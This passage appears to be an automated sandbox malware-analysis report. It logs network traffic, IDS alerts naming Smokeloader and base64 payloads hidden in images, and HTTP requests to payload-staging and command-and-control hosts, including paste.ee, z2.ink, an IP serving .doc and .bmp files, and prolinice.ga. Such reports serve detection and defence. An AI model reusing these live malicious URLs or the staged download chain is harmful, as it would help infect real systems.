              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172

              Networking

              barindex
              Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.97.3:443 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.97.3:443 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2025012 ET TROJAN Powershell commands sent B64 3 188.114.97.3:443 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 188.114.97.3:443 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.22:49176 -> 77.232.129.190:80
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
              Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
              Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
              Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
              Source: unknownDNS query: name: paste.ee
              Source: Yara matchFile source: 12.2.powershell.exe.82d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
              Source: global trafficHTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 54.241.153.192 54.241.153.192
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: BSTV-ASRU BSTV-ASRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficHTTP traffic detected: GET /d/Bo3r4 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /nXPJ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aikpfjvjuwcsxfjs.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61AE6F44.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /d/Bo3r4 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
              Source: global trafficHTTP traffic detected: GET /nXPJ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: z2.ink
              Source: global trafficDNS traffic detected: DNS query: paste.ee
              Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
              Source: global trafficDNS traffic detected: DNS query: prolinice.ga
              Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aikpfjvjuwcsxfjs.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:13 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:14 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 